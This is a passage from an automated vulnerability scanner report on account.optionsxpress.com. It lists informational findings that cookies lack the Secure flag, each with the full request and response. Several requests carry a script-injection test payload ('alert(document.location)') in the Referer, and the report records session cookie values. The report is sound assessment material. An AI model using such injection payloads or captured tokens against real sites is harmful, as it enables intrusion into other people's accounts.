The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/bl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 1197
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "50b284bc1bfcca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E4CCE9D34E711E38DE7ADA84B79732F8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

[binary image/gif data]
...[SNIP]...

6.27. https://account.optionsxpress.com/images/styles/bubble/br.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/br.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/br.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 366
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "203d84bc1bfcca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=956B761F4FA5D2BDCA16DB89838483FB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

[binary image/gif data]
...[SNIP]...

6.28. https://account.optionsxpress.com/images/styles/bubble/l.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/l.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/l.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f05681bc1bfcca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=66E456154210275BF1AD2294C24E11C3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

[binary image/gif data]

6.29. https://account.optionsxpress.com/images/styles/bubble/r.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/r.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/r.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "d0881bc1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4F0588BA4BA85289A097B6894C4CDEEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

[binary image/gif data]

6.30. https://account.optionsxpress.com/images/styles/bubble/t.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/t.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/t.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 44
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "a0227ebc1bfcca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F7D09A6D4566E6FDAE591B92DED017AF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:51 GMT

[binary image/gif data]

6.31. https://account.optionsxpress.com/images/styles/bubble/tl.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tl.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 117
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "d0d71abd1bfcca1:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AFEC1DFC41D58A640965F69675769361; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

[binary image/gif data]

6.32. https://account.optionsxpress.com/images/styles/bubble/tr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/tr.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/tr.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 168
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:40 GMT
Accept-Ranges: bytes
ETag: "90ac1cbd1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9A7796FB49428C50E2B66E9C59EA7A3A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

[binary image/gif data]

6.33. https://account.optionsxpress.com/images/welcome/home/log_out.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/log_out.gif

Issue detail

A cookie issued in the 404 response below does not have the Secure flag set (the response sets both Firm and TLTHID, and neither carries the flag). It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/log_out.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:29 GMT; path=/
Set-Cookie: TLTHID=E6E958F44B303A4485671B976182E8E0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

6.34. https://account.optionsxpress.com/images/welcome/home/open_account_4.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/welcome/home/open_account_4.gif

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /images/welcome/home/open_account_4.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 18 May 2011 15:39:54 GMT
Accept-Ranges: bytes
ETag: "d7ffadd57115cc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CF5297BD4EE7D9842FB52BA82A45D6B5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:25 GMT

[binary image/gif data]

6.35. https://account.optionsxpress.com/inc/general.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/general.js

Issue detail

The cookie issued in the response below does not have the Secure flag set. It does not appear to contain a session token, which may reduce the risk associated with this issue; review the contents of the cookie to determine its function.

Request

GET /inc/general.js HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=D89622F2452C5128A6EE59B41762E5D5

Response

HTTP/1.1 200 OK
Content-Length: 353785
Content-Type: application/x-javascript
Last-Modified: Tue, 31 May 2011 14:21:06 GMT
Accept-Ranges: bytes
ETag: "5ccde7fa9d1fcc1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6BF746C24651B1BAD934E8B86A795596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:24 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// SV 5/16/08 cdn_path is the url of the akamai servers. this checks to see if the cdn_path is defined on the page, and if not assignes it a value of null
try {
   if(cdn_path) {
       // do nothing
   }
...[SNIP]...

6.36. https://account.optionsxpress.com/inc/interface.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/interface.js

Issue detail

The cookies issued in the response below do not have the Secure flag set. They do not appear to contain session tokens, which may reduce the risk associated with this issue; review the contents of the cookies to determine their function.

Request

GET /inc/interface.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 60338
Content-Type: application/x-javascript
Last-Modified: Tue, 03 Aug 2010 21:34:06 GMT
Accept-Ranges: bytes
ETag: "87faba995333cb1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=25FD2BB14273AC991AAA5EABBC316BCE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

// DM - 7/29/05 **** This file contains functions mainly used by designers (open windows, manipulate GUI elements, etc.)
// Ref this file only on pages that need one of these functions.

// Globa
...[SNIP]...

6.37. https://account.optionsxpress.com/inc/js/plugins/accordion.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/accordion.js

Issue detail

The cookies issued in the response below do not have the Secure flag set. They do not appear to contain session tokens, which may reduce the risk associated with this issue; review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/accordion.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 9587
Content-Type: application/x-javascript
Last-Modified: Tue, 11 May 2010 17:47:22 GMT
Accept-Ranges: bytes
ETag: "c07627232f1ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=23A6073F461FC4644E08578F9A204196; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* jQuery UI Accordion 1.7.1
*
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* http:
...[SNIP]...

6.38. https://account.optionsxpress.com/inc/js/plugins/jquery.blockUI.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/js/plugins/jquery.blockUI.js

Issue detail

The cookies issued in the response below do not have the Secure flag set. They do not appear to contain session tokens, which may reduce the risk associated with this issue; review the contents of the cookies to determine their function.

Request

GET /inc/js/plugins/jquery.blockUI.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 15677
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:56:04 GMT
Accept-Ranges: bytes
ETag: "709b2a3483f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=3B138D484BD3DC1EBC2548A8FD6DEEF1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

.../*!
* jQuery blockUI plugin
* Version 2.31 (06-JAN-2010)
* @requires jQuery v1.2.3 or later
*
* Examples at: http://malsup.com/jquery/block/
* Copyright (c) 2007-2008 M. Alsup
* Dual
...[SNIP]...

6.39. https://account.optionsxpress.com/inc/newaccount/general.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/general.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/general.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 75328
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "f02bedc582f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=090C09DA4E6D42932D2F21943A76C7EF; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/* Include general.js */
var s;
s = "<script language=\"javascript\" type=\"text/javascript\" src=\"/inc/general.js\"></script>";        
document.write(s);

/******************************************
...[SNIP]...

6.40. https://account.optionsxpress.com/inc/newaccount/jquer.ui.all.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquer.ui.all.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/newaccount/jquer.ui.all.css HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=758690FA4AB663400EE3B482D991146F

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:25:22 GMT; path=/
Set-Cookie: TLTHID=DC968495491D236FAF80D1B2AC99C2C7; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

6.41. https://account.optionsxpress.com/inc/newaccount/jquery-1.3.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /inc/newaccount/jquery-1.3.2.min.js

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /inc/newaccount/jquery-1.3.2.min.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 59326
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 20:52:59 GMT
Accept-Ranges: bytes
ETag: "107aedc582f0ca1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CC03F0C431889309D8520BC90B6D7F4; Path=/; Domain=.optionsxpress.com
